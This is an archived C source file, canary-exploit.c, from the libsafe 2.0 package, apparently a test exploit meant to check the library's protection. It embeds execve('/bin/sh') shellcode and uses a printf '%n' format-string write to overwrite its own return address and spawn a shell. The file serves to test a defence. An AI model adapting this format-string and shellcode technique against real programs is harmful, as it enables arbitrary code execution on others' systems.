"Fossies" - the Fresh Open Source Software Archive

Member "libsafe-2.0-16/exploits/canary-exploit.c" (19 Jun 2001, 2122 Bytes) of package /linux/misc/old/libsafe-2.0-16.tgz:

As a special service "Fossies" has tried to format the requested source page into HTML format using (guessed) C and C++ source code syntax highlighting (style: standard) with prefixed line numbers and code folding option. Alternatively you can here view or download the uninterpreted source code file. 
    1 /*
    2  * $Name: release2_0-16 $
    3  * $Id: canary-exploit.c,v 1.4 2001/06/19 18:22:15 ttsai Exp $
    4  */
    5 
    6 
    7 #include <stdio.h>
    8 #include <sys/types.h>
    9 #include <stdlib.h>
   10 
   11 char shellcode[] =
   12     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   13     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   14     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
   15 
   16 void foo(caddr_t ra)
   17 {
   18     caddr_t *ra_ptr;
   19     FILE *fp;
   20     caddr_t *nextfp;
   21 
   22     printf("This program tries to use printf(\"%%n\") to overwrite the\n");
   23     printf("return address on the stack.\n");
   24     printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
   25     printf("Press any key to continue...");
   26     getchar();
   27 
   28     nextfp = __builtin_frame_address(1);
   29 
   30     /*
   31      * Find the location of the return address on the stack.
   32      */
   33     for (ra_ptr=__builtin_frame_address(0)+4; *ra_ptr!=ra; ra_ptr++) {
   34      if (ra_ptr >= nextfp) {
   35          printf("Unable to find the return address on the stack!\n");
   36          exit(1);
   37      }
   38     }
   39 
   40     /*
   41      * Overwrite the return address with the starting address to the attack
   42      * code.  We need to redirect the output to /dev/null, since we're not
   43      * really interested in the output of fprintf, just the value written via
   44      * the %n conversion.
   45      */
   46     fp = fopen("/dev/null", "w");
   47     fprintf(fp, "%.*d%n\n", (int)shellcode, 0, (int *)ra_ptr);
   48     fclose(fp);
   49 }
   50 
   51 int main(int ac, char *av[])
   52 {
   53     /*
   54      * main() is written mostly in assembly to avoid the differences due to
   55      * different compilers and compiler optimizations.  The following
   56      * instructions push the return address from foo() onto the stack and then
   57      * call foo().  We have to explicitly pass the return address to foo(),
   58      * because foo() needs to search for the location of the return address on
   59      * the stack.  This search is necessary because some compilers may not
   60      * place the return address immediately before the frame pointer, which
   61      * causes __builtin_return_address(0) to fail.
   62      */
   63     __asm__ __volatile__(
   64     "push   $0f;"
   65     "call   foo;"
   66     "0: add $4,%%esp"
   67     :
   68     :
   69     );
   70 
   71     return 0;
   72 }